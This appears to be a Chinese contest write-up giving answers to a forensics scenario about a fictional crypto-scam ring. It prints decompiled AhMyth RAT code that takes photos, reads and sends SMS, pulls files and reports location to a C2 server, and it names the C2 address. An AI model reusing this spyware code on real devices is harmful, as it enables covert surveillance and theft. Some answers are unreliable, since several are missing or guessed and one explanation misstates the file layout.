2024美亚杯团体赛

容器密码

bWuDw#3qthnMpLz8+6>c!CHFmPKgB&?J5f:A4^a);d=*ysv7Rxn>fzT^BH8;JV#qSpF5C7kb4DsA$?a+9E6KZ3\xRwW=(jceu:NvvXD7r@&9YJz/nwbh<A:Pma4(K%3!

答案参考

https://mp.weixin.qq.com/s/vvoI1M6wKriNNpTQKxa2Vg?nwr_flag=1#wechat_redirect

https://mp.weixin.qq.com/s/ItUo_QqNYx41dECTb_2kDg?nwr_flag=1#wechat_redirect

题目

1. [填空题] 在个人赛的最后一部分,你对David的数字设备进行了取证检查,发现他与一名成员Alice有可疑的沟通。你现在分析Alice 的手机。

参考Alice_Mobile.bin,Alice所使用的手机网络运营商公司的名称是什么?
(答案格式: 请用大写英文字母作答 ,无须留空白) (1分)

image-20241128145930425

Lucky HK

2. [填空题] 参考Alice_Mobile.bin,Alice 所使用的谷歌电子邮件地址是?

(答案格式: 请用小写英文字母作答,例如:abc@google.com) (2分)

image-20241128151542705

alicecutter94@gmail.com

3. [单选题] 参考Alice_Mobile.bin,谁向Alice发送了一个含有个人资料的xlsx文件? (1分)

A.David
B.John
C.Ben
D.Amy
E.Harry

image-20241128150930354

B

4. [填空题] 承上题,参考Alice_Mobile.bin,该文件以MD5计算的哈希值是?

(答案格式: 请用大写英文字母作答和用阿拉伯数字回答) (1分)

image-20241128151003170

5457d5a68673b8d093d7666d515cccb2

5. [单选题] 参考Alice_Mobile.bin, Alice于Facebook(脸书)所建立的群组? (1分)

A.大学生炒散慍工群
B.最全面搵工推介
C.全港笋工好工推介2024
D.捣工全职兼职
E.搵工WhatsApp群

image-20241128152843149

C

6. [单选题] 参考Alice_Mobile.bin, Alice在2024年8月15日于哪个地铁站和"客服人员"相约见面? (2分)

A.Chai Wan
B.Tai Koo
C.Wan Chai
D.Central
E.Mong Kok

分析WhatsApp中的私聊消息,可以确定Alice招募了三个客服人员,分别为ZhangWei、李静和王磊,并且创建了四人的群聊Fast cash

在群聊中王磊提议晚上去酒吧玩,并与Alice等人约定晚上10点在Wan Chai地铁站见面

image-20241128153435011

C

7. [填空题] 参考Alice_Mobile.bin,受骗女子欧凯被指示将虚拟货币转到哪个钱包地址?

(答案格式: 大写英文字母, 小写英文字母及阿拉伯数字混合组成,例如: 0xDasdGJHI34twebGHJK2354YU34h) (2分)

在Fast cash群聊中,Alice交代李静骗欧凯的相关事宜,提到了钱包地址

image-20241128153559380

0xdA9AE5b1bA2F404D0490dcd18a5C2247866FD148

8. [单选题] 参考Alice_Mobile.bin, Alice指示"客服人员"使用什么交通工具离开香港? (1分)

A.火车
B.私家车
C.飞机
D.船
E.货柜车

image-20241128153701834 image-20241128153717920

D.船

9. [填空题] 参考Alice_Mobile.bin,客服人员"ZHANG WEI"的银行卡号是多少?

(答案格式:用阿拉伯数字回答, 例如: 54613165456431) (2分)

image-20241128153741242 image-20241128153754554

*10. [单选题] 参考Alice_Mobile.bin,Alice总共在脸书(FACEBOOK)上发布了多少张照片? (2分)

A.1
B.3
C.5
D.7
E.9

不会

C

11. [填空题] 参考Alice_Mobile.bin,应用程序WhatsApp的数据库 (database) 内, 哪个message_type代表发送的内容是表情包 (Sticker)?

(答案格式:用阿拉伯数字回答) (3分)

image-20241128155903486

image-20241128160043555

发现是20

20

12. [填空题] 参考Alice_Mobile.bin,在Alice手机中,哪一个数据库(Database)记录了照片的数据?

(答案格式:只需使用全部大写回答, 例如:ABC.DB) (2分)

image-20241128160910167

external.db

13. [填空题] 承上题,参考Alice_Mobile.bin,该文件的最后修改日期和时间 (Last Modified Time) 是?

(答案格式:YYYY-MM-DD HH:MM:SS) (2分)

image-20241128160950239

2024-08-30 17:28:29

14. [单选题] 从Alice的手机中发现,她一直与一名叫John的成员保持联系,你接着分析John的手机。

参考John_Smartphone_itunebackup.zip, 备份密码是「1234」, 回答以下题目:
在WhatsApp通讯软件内「三五成群」群组于什么时间创建? (2分)

A.2024-08-29 17:44:38
B.2024-07-25 15:22:09
C.2024-07-30 12:45:50
D.2024-07-30 16:15:34

image-20241128161050887

B

15. [单选题] 参考John_Smartphone_itunebackup.zip,照片IMG_007的创建日期时间是? (2分)

A.2024年8月14日星期三下午02:54
B.2024年9月02日星期三下午12:54
C.2024年8月14日星期二下午12:54
D.2024年8月16日星期五下午12:54

image-20241128162251461

C

16. [单选题] 参考John_Smartphone_itunebackup.zip,John曾使用什么通讯软件联系Ben? (2分)

A.Reddit
B.WhatsApp
C.WeChat
D.Line

image-20241128162741019

B

17. [填空题] 参考John_Smartphone_itunebackup.zip,于“三五成群”群中, 电子表格文件"Personal_data.xlsx"是由哪一个电话号码发送到该群组的?

(答案格式:只需要用阿拉伯数字回答,包含国际电话区号和电话号码,例如:85290001111) (2分)

image-20241128163204849

85269711024

18. [单选题] 他与一个叫Ben的人有可疑的沟通。你接着分析Ben的手机。

参考BeniPhone.zip,根据 Ben 手机内通讯软件的记录,"This is a RAT APK that allows us to control Android devices remotely, enabling data access, monitoring and manipulation through an interface"是在什么时间接收或发出的? (1分)

A.由Ben于 2024-08-02 16:17:07 接收
B.由Ben于 2024-08-05 15:53:37 发出
C.由Ben于 2024-08-05 16:58:12 接收
D.由Ben于 2024-08-05 17:22:47 发出

image-20241128163404738

B

19. [单选题] 参考BeniPhone.zip,根据 Ben 手机内的照片记录,"IMG_0011.PNG"是通过哪种方式生成的? (2分)

A.从互联网下载
B.手机拍摄
C.手机截图
D.以上皆不是

Ben的iPhone手机备份爆破

密码0000

直接在Ben的iPhone手机文件夹中找到这张图片

image-20241129113345584

C

20. [单选题] 你发现了该犯罪团伙似乎有一个共同的聊天群,其中包含有关可疑资本管理(与虚拟货币相关)的更多线索。

参考该聊天群组对话分析,John,David及Alice筹集资金的目的是什么? (1分)

A.建立一个网站给人投资虚拟货币
B.建立一个网站用作行骗
C.创建虚拟货币钱包用作洗黑钱
D.写一个Android(APN应用程序包用作沟通

网站搭建在筹集资金之前

image-20241129114450115

共同聊天群就是“三五成群”

image-20241129113908499

B

21. [单选题] 参考該聊天群对话、David,Emma與Clara 的对话及IDFC的交易记录分析,哪一个虚拟货币地址储存John,David及Alice所筹集的IDFC? (3分)

A.0xe90ad3f80e39e83b533eef3ed23c641ec51089c6
B.0x04d079c7ace663bbe1d2c201072d63b036d16ccd
C.0x10a4f01b80203591ccee76081a4489ae1cd1281c
D.0x8155c0b8a0c95424f433d8ab6342086f0433e6c4

image-20241129114507114

在个人赛David的电脑中有个记录有虚拟货币交易记录的表格

2024-08-14 18:23:57

image-20241129114659954

22. [单选题] 参考Alice_Mobile.bin,Alice 总共使用了多少个虚拟货币地址直接接收受害人的IDFC? (2分)

A.1
B.3
C.6
D.7

从客服群里搜0x

image-20241129134601150 image-20241129134636966 image-20241129134707929 image-20241129134738764 image-20241129134757400 image-20241129134813592

一共是六个

image-20241129134931988

还有一个大鱼

C

23. [多选题] 參考David_Laptop.e01內找到的IDFC交易记录,在收取受害人的IDFC后,它之后会再流向哪些虚拟货币地址? (2分)

A.0xb2e3dbea311511ec5bda3e85e061f15366f888a6
B.0x70544880875fe907cee383873ca58da23378caa5
C.0x152c90200be61a540875f2a752c328bd19dbfb87
D.0x59eb2c55eefdd4d8af2886c9fd8fc6f465c3e220

思路1:

image-20241129135045297

思路2:

image-20241129134541451

BCD

24. [单选题] 承上题,上述IDFC去到那些地址后,谁掌管这些IDFC?

(提示:分析IDFC的交易记录及个人赛所搜集的证据) (2分)

A.Alice(回復種子:pumpkin fold behind captain shoulder demand print hospital like smoke gate weird)
B.Ben(回復種子:wrap muscle rhythm stamp bundle zebra gorilla shuffle common tattoo ginger awake)
C.John(回復種子:abandon among anxiety pizza evidence face quiz ripple nerve pact nasty unveil)
D.David(回復種子:stock avocado grab clay light sadness segment ancient toe talk elder oil)

个人赛可以知道,David拥有IDFC,并且有恢复种子

图片

D

25. [单选题] 2024年9月,Tom Victor带同其秘书Amy来到警署报案,称其秘书被骗子用人工智能视频在2024年8月29日早上骗去10,000,000 IDFC,请找出该交易的交易哈希(Transaction Hash) ? (2分)

A.0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a483dd92d
B.0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792a
C.0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792d
D.0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792c

进行时间筛选:

image-20241129140740815
0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792d

C

26. [多选题] 就現時搜集到的證據、David_Laptop_64GB.e01内的资料及IDFC的资金流分析,下列哪些虚擬货币地址是最終诈骗集团儲存犯罪所得的地址? (3分)

A.0x63a8ba1df0404ee41f7c6af8efd2f54006f32042
B.0xe90ad3f80e39e83b533eef3ed23c641ec51089c6
C.0x10a4f01b80203591ccee76081a4489ae1cd1281c
D.0x90f73497e4446f6cf9881213c32d6af66d799fe5

image-20241129140544120

AD

27. [单选题] 你现在查看Ben的笔记本电脑,并发现了 APK 文件。

一般而言,APK 的关键组成部分是什么? (3分)

A.AndroidManifest.xml,classes.dex,resources.arsc,res/
B.AndroidManifest.xml,META-INF/,res/,assets/
C.classes.dex,lib/,AndroidManifest.xml,META-INF/
D.res/,assets/,AndroidManifest.xml,classes.dex

一个典型的 APK 文件包含以下关键组成部分:

  1. AndroidManifest.xml:描述应用程序的配置信息(权限、组件等)。
  2. classes.dex:包含经过 Dalvik/ART 虚拟机编译的字节码。
  3. resources.arsc:资源索引文件,存储已编译的资源信息。
  4. res/:未编译的资源文件(图片、布局等)。

其他选项虽然包含部分正确内容,但并不全面或包含非关键组成部分,例如 META-INF/ 仅用于签名信息,不是核心组成部分。

A

28. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk, 这个 APK 没有 classes.dex 文件,而是有 smali 文件,以下哪一个陈述是正确的? (3分)

A.这是一个經過反向工程製作的APK
B.该APK已损坏
C.文件结构不完整
D.APK包含加密代码

smali文件是classes.dex文件反编译后的结果

A

29. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk, Ben 使用了哪个工具包生成恶意APK 以控制受害者的设备? (1分)

A.Metasploit
B.SpyNote
C.QuasarRAT
D.AhMyth

根据包名判断

AhMyth

image-20241128172459479

D

30. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk,确认哪个 .xml 文件被特别添加为主活动(activity_main)的布局文件? (3分)

A.activity main.xml
B.main activity.xml
C.main.xml
D.Thisismain.xml

image-20241128172658287

D

31. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk, 确认被指定为主活动层(activity main layer) .xml 文件的公共 ID? (3分)

A.0x7f040000
B.0x7f050000
C.0x7f060000
D.0x7f070000

image-20241128172759067

D

32. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk,确认应用程序没有要求的权限? (3分)

A.android.permission.READ CONTACTS
B.android.permission.USE FINGERPRINT
C.android.permission.WRITE CALENDAR
D.android.permission.ACCESS FINE LOCATION

image-20241128173629228

B

33. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk,ahmyth/mine/king/ahmyth/ 文件夹下的 b.smali 文件的主要功能是什么? (3分)

A.管理网络连接
B.处理相机操作并捕捉图像
C.管理应用程序设置
D.处理数据库操作

package ahmyth.mine.king.ahmyth;

import android.content.Context;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.graphics.SurfaceTexture;
import android.hardware.Camera;
import java.io.ByteArrayOutputStream;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;

/* loaded from: classes.dex */
public class b {

    /* renamed from: a, reason: collision with root package name */
    private Context f36a;

    /* renamed from: b, reason: collision with root package name */
    private Camera f37b;

    /* loaded from: classes.dex */
    class a implements Camera.PictureCallback {
        a() {
        }

        @Override // android.hardware.Camera.PictureCallback
        public void onPictureTaken(byte[] bArr, Camera camera) {
            b.this.d();
            b.this.e(bArr);
        }
    }

    public b(Context context) {
        this.f36a = context;
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void d() {
        Camera camera = this.f37b;
        if (camera != null) {
            camera.stopPreview();
            this.f37b.release();
            this.f37b = null;
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void e(byte[] bArr) {
        try {
            Bitmap decodeByteArray = BitmapFactory.decodeByteArray(bArr, 0, bArr.length);
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            decodeByteArray.compress(Bitmap.CompressFormat.JPEG, 20, byteArrayOutputStream);
            JSONObject jSONObject = new JSONObject();
            jSONObject.put("image", true);
            jSONObject.put("buffer", byteArrayOutputStream.toByteArray());
            e.a().b().a("x0000ca", jSONObject);
        } catch (JSONException e) {
            e.printStackTrace();
        }
    }

    public JSONObject c() {
        JSONObject jSONObject;
        if (!this.f36a.getPackageManager().hasSystemFeature("android.hardware.camera")) {
            return null;
        }
        try {
            JSONObject jSONObject2 = new JSONObject();
            JSONArray jSONArray = new JSONArray();
            jSONObject2.put("camList", true);
            int numberOfCameras = Camera.getNumberOfCameras();
            for (int i = 0; i < numberOfCameras; i++) {
                Camera.CameraInfo cameraInfo = new Camera.CameraInfo();
                Camera.getCameraInfo(i, cameraInfo);
                int i2 = cameraInfo.facing;
                if (i2 == 1) {
                    jSONObject = new JSONObject();
                    jSONObject.put("name", "Front");
                    jSONObject.put("id", i);
                } else if (i2 == 0) {
                    jSONObject = new JSONObject();
                    jSONObject.put("name", "Back");
                    jSONObject.put("id", i);
                } else {
                    jSONObject = new JSONObject();
                    jSONObject.put("name", "Other");
                    jSONObject.put("id", i);
                }
                jSONArray.put(jSONObject);
            }
            jSONObject2.put("list", jSONArray);
            return jSONObject2;
        } catch (JSONException e) {
            e.printStackTrace();
            return null;
        }
    }

    public void f(int i) {
        Camera open = Camera.open(i);
        this.f37b = open;
        this.f37b.setParameters(open.getParameters());
        try {
            this.f37b.setPreviewTexture(new SurfaceTexture(0));
            this.f37b.startPreview();
        } catch (Exception e) {
            e.printStackTrace();
        }
        this.f37b.takePicture(null, null, new a());
    }
}

解析:

根据提供的代码,b 类的主要功能是:

  1. 检查设备是否支持相机(c() 方法)。
  2. 获取设备上的相机列表(前置、后置等)(c() 方法)。
  3. 打开指定的相机、启动预览并拍摄图片(f() 方法)。
  4. 在图片拍摄完成后,通过回调(onPictureTaken 方法)处理图片数据,并将其压缩为 JPEG 格式,然后通过 JSON 发送出去(e() 方法)。

这些功能明确指向 相机操作和图像捕获

B

34. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk,在 ahmyth/mine/king/ahmyth/ 文件夹下的 b.smali 文件中,字节数组(Byte Array)在发送到服务器之前执行了哪一系列操作,最终的图像格式是? (3分)

A.字节数组被译码、加密、转换为PNG格式,并发送到服务器
B.字节数组被译码、
压缩成PEG格式,并封装到SONObject中再发送到服务器
C.字节数组被编码为String,压缩成BMP格式,转换为字节数组并发送
字节数组被编码为String,压缩成PEG格式,转换为字节数组并发送

从代码分析可知:

  1. 字节数组被译码Bitmap decodeByteArray = BitmapFactory.decodeByteArray(bArr, 0, bArr.length); 将字节数组解码为 Bitmap
  2. 压缩为JPEG格式decodeByteArray.compress(Bitmap.CompressFormat.JPEG, 20, byteArrayOutputStream); 将图片压缩为JPEG格式,并设置压缩质量为20%。
  3. 封装到JSONObject中jSONObject.put("buffer", byteArrayOutputStream.toByteArray()); 将压缩后的字节数组封装到 JSON 对象中。
  4. 发送到服务器:调用 e.a().b().a("x0000ca", jSONObject); 方法将 JSON 对象发送到服务器。

最终的图像格式是 JPEG,而不是 PNG 或 BMP,因此选项 B 正确。

B

35. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk, 在 ahmyth/mine/king/ahmyth/ 文件夹下的b.smali文件中,图像在发送到服务器時的压缩比率是多少? (6分)

A50%
B.30%
C.20%
D.10%

decodeByteArray.compress(Bitmap.CompressFormat.JPEG, 20, byteArrayOutputStream); 将图片压缩为JPEG格式,并设置压缩质量为20%。

C

36. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk,在 ahmyth/mine/king/ahmyth/ 文件夹下的 ConnectionManager.smali 中,sendReq method 的目的是什么? (6分)

A.C2服务器向受感染的设备发送请求
B.处理用户接口的更新
C.建立到C2服务器的网络连接
D.管理应用程序设置

package ahmyth.mine.king.ahmyth;

import android.content.Context;
import android.os.Handler;
import android.os.Looper;
import android.util.Log;
import b.a.c.a;
import java.lang.reflect.Method;
import org.json.JSONObject;

/* loaded from: classes.dex */
public class ConnectionManager {

    /* renamed from: a, reason: collision with root package name */
    public static Context f26a;

    /* renamed from: b, reason: collision with root package name */
    private static b.a.b.e f27b;

    /* renamed from: c, reason: collision with root package name */
    private static d f28c = new d();

    /* loaded from: classes.dex */
    class a implements Runnable {

        /* renamed from: a, reason: collision with root package name */
        final /* synthetic */ Method f29a;

        a(Method method) {
            this.f29a = method;
        }

        @Override // java.lang.Runnable
        public void run() {
            try {
                Context context = (Context) this.f29a.invoke(null, null);
                if (context != null) {
                    ConnectionManager.startAsync(context);
                }
            } catch (Exception unused) {
            }
        }
    }

    /* loaded from: classes.dex */
    class b implements a.InterfaceC0012a {
        b() {
        }

        @Override // b.a.c.a.InterfaceC0012a
        public void a(Object... objArr) {
            ConnectionManager.f27b.a("pong", new Object[0]);
        }
    }

    /* loaded from: classes.dex */
    class c implements a.InterfaceC0012a {
        c() {
        }

        @Override // b.a.c.a.InterfaceC0012a
        public void a(Object... objArr) {
            char c2;
            try {
                JSONObject jSONObject = (JSONObject) objArr[0];
                String string = jSONObject.getString("order");
                Log.e("order", string);
                switch (string.hashCode()) {
                    case 546266838:
                        if (string.equals("x0000ca")) {
                            c2 = 0;
                            break;
                        }
                        c2 = 65535;
                        break;
                    case 546266849:
                        if (string.equals("x0000cl")) {
                            c2 = 3;
                            break;
                        }
                        c2 = 65535;
                        break;
                    case 546266851:
                        if (string.equals("x0000cn")) {
                            c2 = 4;
                            break;
                        }
                        c2 = 65535;
                        break;
                    case 546266943:
                        if (string.equals("x0000fm")) {
                            c2 = 1;
                            break;
                        }
                        c2 = 65535;
                        break;
                    case 546267129:
                        if (string.equals("x0000lm")) {
                            c2 = 6;
                            break;
                        }
                        c2 = 65535;
                        break;
                    case 546267150:
                        if (string.equals("x0000mc")) {
                            c2 = 5;
                            break;
                        }
                        c2 = 65535;
                        break;
                    case 546267346:
                        if (string.equals("x0000sm")) {
                            c2 = 2;
                            break;
                        }
                        c2 = 65535;
                        break;
                    default:
                        c2 = 65535;
                        break;
                }
                switch (c2) {
                    case 0:
                        if (jSONObject.getString("extra").equals("camList")) {
                            ConnectionManager.x0000ca(-1);
                            return;
                        } else if (jSONObject.getString("extra").equals("1")) {
                            ConnectionManager.x0000ca(1);
                            return;
                        } else {
                            if (jSONObject.getString("extra").equals("0")) {
                                ConnectionManager.x0000ca(0);
                                return;
                            }
                            return;
                        }
                    case 1:
                        if (jSONObject.getString("extra").equals("ls")) {
                            ConnectionManager.x0000fm(0, jSONObject.getString("path"));
                            return;
                        } else {
                            if (jSONObject.getString("extra").equals("dl")) {
                                ConnectionManager.x0000fm(1, jSONObject.getString("path"));
                                return;
                            }
                            return;
                        }
                    case 2:
                        if (jSONObject.getString("extra").equals("ls")) {
                            ConnectionManager.x0000sm(0, null, null);
                            return;
                        } else {
                            if (jSONObject.getString("extra").equals("sendSMS")) {
                                ConnectionManager.x0000sm(1, jSONObject.getString("to"), jSONObject.getString("sms"));
                                return;
                            }
                            return;
                        }
                    case 3:
                        ConnectionManager.x0000cl();
                        return;
                    case 4:
                        ConnectionManager.x0000cn();
                        return;
                    case 5:
                        ConnectionManager.x0000mc(jSONObject.getInt("sec"));
                        return;
                    case 6:
                        ConnectionManager.x0000lm();
                        return;
                    default:
                        return;
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    private static void b() {
        try {
            Method method = Class.forName("android.app.ActivityThread").getMethod("currentApplication", new Class[0]);
            Context context = (Context) method.invoke(null, null);
            if (context == null) {
                new Handler(Looper.getMainLooper()).post(new a(method));
            } else {
                startAsync(context);
            }
        } catch (ClassNotFoundException unused) {
        }
    }

    public static void sendReq() {
        try {
            if (f27b != null) {
                return;
            }
            b.a.b.e b2 = e.a().b();
            f27b = b2;
            b2.e("ping", new b());
            f27b.e("order", new c());
            f27b.w();
        } catch (Exception e) {
            Log.e("error", e.getMessage());
        }
    }

    public static void startAsync(Context context) {
        try {
            f26a = context;
            sendReq();
        } catch (Exception unused) {
            startAsync(context);
        }
    }

    public static void startContext() {
        try {
            b();
        } catch (Exception unused) {
        }
    }

    public static void x0000ca(int i) {
        if (i == -1) {
            JSONObject c2 = new ahmyth.mine.king.ahmyth.b(f26a).c();
            if (c2 != null) {
                f27b.a("x0000ca", c2);
                return;
            }
            return;
        }
        if (i == 1) {
            new ahmyth.mine.king.ahmyth.b(f26a).f(1);
        } else if (i == 0) {
            new ahmyth.mine.king.ahmyth.b(f26a).f(0);
        }
    }

    public static void x0000cl() {
        f27b.a("x0000cl", ahmyth.mine.king.ahmyth.a.a());
    }

    public static void x0000cn() {
        f27b.a("x0000cn", ahmyth.mine.king.ahmyth.c.a());
    }

    public static void x0000fm(int i, String str) {
        if (i == 0) {
            f27b.a("x0000fm", d.b(str));
        } else if (i == 1) {
            d.a(str);
        }
    }

    public static void x0000lm() {
        Looper.prepare();
        f fVar = new f(f26a);
        JSONObject jSONObject = new JSONObject();
        if (fVar.a()) {
            double b2 = fVar.b();
            double d2 = fVar.d();
            Log.e("loc", b2 + "   ,  " + d2);
            jSONObject.put("enable", true);
            jSONObject.put("lat", b2);
            jSONObject.put("lng", d2);
        } else {
            jSONObject.put("enable", false);
        }
        f27b.a("x0000lm", jSONObject);
    }

    public static void x0000mc(int i) {
        g.c(i);
    }

    public static void x0000sm(int i, String str, String str2) {
        if (i == 0) {
            f27b.a("x0000sm", h.a());
        } else if (i == 1) {
            f27b.a("x0000sm", Boolean.valueOf(h.b(str, str2)));
        }
    }
}

sendReq 方法可以看出:

  1. 方法中检查 f27b 是否为 null,若不是则直接返回。这表明该方法只在首次调用时初始化连接。
  2. 使用了 e.a().b() 创建并初始化了 b.a.b.e 对象(代表与 C2 服务器的通信通道)。
  3. 注册了 pingorder 事件监听器,用于处理服务器发送的命令,如“pong”响应或 JSON 格式的指令。
  4. 调用了 f27b.w(),很可能是执行网络连接的关键步骤。

C

37. [单选题] 承上题,参考Ben_Laptop.zip内的Joshe Investment.apk,C2服务器的 IP 地址及端口号? (6分)

A.IP: 192.168.1.1:8080
B.IP: 10.0.0.1:80
C.IP: 172.16.0.1:443
D.IP: 59.152.211.11:4444

image-20241128191002328

D

38. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk, ahmyth/mine/king/ahmyth/ 文件夹下的 g.smali 文件中,MediaRecorder 被初始化用于录音。如果 setAudioSource() 方法使用了错误的参数,会发生什么,且这将如何影响录音过程的功能? (6分)

A.应用将以默认设置继续录音,但音质可能会降低
B. MediaRecorder 会抛出 IllegalStateException,并阻止录音的开始
C.录音将继续但文件格式将与指定的输出格式不兼容
D. 应用只会在调用 start() 方法后由于无效的音频编码而崩溃

使用 MediaRecorder.setAudioSource() 时,如果传入的参数无效,MediaRecorder 会抛出异常并终止录音流程,防止错误配置影响录音功能。

B

39. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk, ahmyth/mine/king/ahmyth/ 文件夹下的 g.smali 文件中,TimerTask 用于在启动 MediaRecorder 后调度动作。TimerTask 在这个过程中有什么作用? (6分)

A.它以设定的间隔暂停录音,以更好地管理资源
B.它通过在设定的间隔调整录音参数来提高音质
C.它定期压缩录制的音讯文件以节省存储空间
D.它监控录音时长,并根据录音时间安排事件

D

40. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk, 在 ahmyth/mine/king/ahmyth/ 文件夹下的 h.smali 文件中,method a() 和method b() 的主要功能有什么区别? (6分)

A.Method a()是检索存储在设备上的联系人清单并将其格式化为JSONArray,而method b()是从被入侵的设备向联系人发送消息
B.Method a()是收集收件箱中的所有SMS短信,而method b()是利用被入侵的设备发送SMS短信
C.Method a()是向指定的电话号码发送包含自定义消息内容的SMS短信,method b()是接收发送确认
D.Method a()是从设备中检索MMS短信,而method b()是使用被入侵的设备发送MMS短信

  • Method a():此方法从设备的短信收件箱中收集所有的短信,并将它们格式化为一个 JSONArray,其中每个元素都是一个包含发件人的电话号码 (phoneNo) 和短信内容 (msg) 的 JSONObject。最终,这些数据被封装进一个更大的 JSONObject 对象中,该对象以 "smsList" 作为键名保存了整个短信列表。因此,这个方法的主要功能是收集收件箱中的所有短信。
  • Method b():此方法接受两个字符串参数,第一个参数 str 是目标电话号码,第二个参数 str2 是要发送的消息内容。该方法使用 SmsManager 发送一条文本消息到指定的电话号码,并返回一个布尔值来表示操作是否成功执行。因此,这个方法的功能是利用设备发送 SMS 短信。

B

41. [单选题] 参考Ben_Laptop.zip内的Joshe Investment.apk, 在 ahmyth/mine/king/ahmyth/ 文件夹下的 h.smali 文件中,method b() 需要哪些参数? (6分)

A.method b()请求两个字符串参数联系人姓名和联系人号码
B.method b()请求一个文件路径的字符串参数和一个数据内容的字符串参数
C.method b()请求一个URL的字符串参数和一个负载数据的字符串参数
D.method b()请求两个字符串参数接收者的电话号码和消息内容

在给定的代码中,h.b() 方法用于发送短信。该方法接受两个字符串参数接收短信的电话号码(str),另一个是短信内容(str2)。因此,正确答案是

D

42. [单选题] 在分析Ben的笔记本电脑时,你从调查人员那里获得了以下信息:在对一名被捕的犯罪集团成员进行审问时获得的情报显示,Ben对John心怀怨恨,因为John扣留了Ben的犯罪收益份额。因此,Ben加密了John的机密文件夹,以限制他的访问。

参考Ben_Laptop.zip,解密secretExcel.encrypted的第一步应该是什么? (2分)

A.生成新的随机密钥
B.打开加密文件并读取文件的前16个字节
C.压缩加密档
D.删除加密档

import os
import sys
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad

def encrypt_file(file_path, password):
    salt = get_random_bytes(32)
    
    key = PBKDF2(password, salt, dkLen=32, count=100000000)

    file_path = os.path.abspath(file_path)
    
    output_dir = os.path.dirname(file_path)
    folder_name = os.path.splitext(os.path.basename(file_path))[0]
    encrypted_path = os.path.join(output_dir, f"{folder_name}.encrypted")
    
    os.makedirs(os.path.dirname(encrypted_path), exist_ok=True)
    
    with open(file_path, 'rb') as f_in, open(encrypted_path, 'wb') as f_out:
        data = f_in.read()
        cipher = AES.new(key, AES.MODE_CBC)
        
        f_out.write(cipher.iv)
        f_out.write(salt)
        
        encrypted_data = cipher.encrypt(pad(data, AES.block_size))
        f_out.write(encrypted_data)
    
    print(f"File encrypted successfully: {encrypted_path}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python encrypt.py <file_path> <password>")
        sys.exit(1)

    file_path = sys.argv[1]
    password = sys.argv[2]
    
    encrypt_file(file_path, password)

B. 打开加密文件并读取文件的前16个字节

在解密文件时,第一步是打开加密文件并读取文件的前16个字节。这16个字节包含了初始化向量(IV)和盐值(salt),它们对于解密过程至关重要。接下来,使用这些信息和提供的密码来生成与加密时相同的密钥,然后继续进行解密操作。

43. [单选题] 参考Ben_Laptop.zip,在加密文件secretExcel.encrypted中,初始向量 (Initial Vector) 的值是什么? (2分)

A.64f4e21c1e4cc3a60137da79e75bf973
B.a6b7e84f91827c3d2a94bfed7b5ca9d1
C.3b29d2a46aab93bba07c6893d1b8e93a
D.7f8d9b2a14c5aef3786d12c4b6e2d4f9

在加密文件 secretExcel.encrypted 中,盐值存储在IV后面,紧接着是加密数据。具体来说,在文件结构中:

  • 前16字节是初始向量(IV)。
  • 紧接着的32字节是盐值(salt)。
def extract_iv_and_salt(encrypted_file_path):
    with open(encrypted_file_path, 'rb') as f:
        # 读取前16字节作为IV
        iv = f.read(16)
        # 读取接下来的32字节作为salt
        salt = f.read(32)

        print(f"Initial Vector (IV): {iv.hex()}")
        print(f"Salt: {salt.hex()}")

if __name__ == "__main__":
    encrypted_file_path = "secretExcel.encrypted"  # 替换为你的加密文件路径
    extract_iv_and_salt(encrypted_file_path)
Initial Vector (IV): 64f4e21c1e4cc3a60137da79e75bf973
Salt: 5d5ca840accf95169288de5bf85dacd7bb05ad888afac26efd05cc436c4a5424

A

44. [单选题] 参考Ben_Laptop.zip,在加密文件secretExcel.encrypted中,盐值 (SALT) 是什么? (2分)

A.5d5ca840accf95169288de5bf85dacd7bb05ad888afac26efd05cc436c4a5424
B.a3d9f0e4b7c8d5a9c2e7f0b3a5d7c6b1b8e7a2f9c3d1e4f5a6b9cOd7e1f2b4c8
C.f2e1d0c9b8a7f6e5d4c3b2a1e8f7d6c5b4a3d2f1e0c9b8a7d6e5c4b3a2f1e0d9
D.c/b6a5d4e3f2d1cOe9d8b7a6f5e4d3c2b1a0e9f8d7c6b5a4b3c2d1e0f9e8d7c6

A

45. [单选题] 参考Ben_Laptop.zip,查看 'encrypt.py'代码,如果更改'PBKDF2' 的 'count' 参数会产生什么影响? (2分)

A.仅影响解密时所需的计算性能
B.仅影响加密的安全性
C.同时影响所需的计算性能和安全性
D.没有影响

解释:

  • 计算性能count 参数指定了PBKDF2算法的迭代次数,增加该值会导致更多的计算步骤,从而增加加密和解密时所需的计算时间。较高的 count 值意味着更强的抗攻击能力,但也会增加计算负担。
  • 安全性:增加 count 参数的值会增强加密的安全性,因为攻击者需要更长的时间来进行暴力破解或其他攻击,尤其是针对密码猜解的攻击(如字典攻击和暴力攻击)。通过提高 count 值,计算变得更加昂贵和缓慢,从而提高了安全性。

因此,改变 count 参数会同时影响解密和加密时的计算性能以及加密的安全性。

C

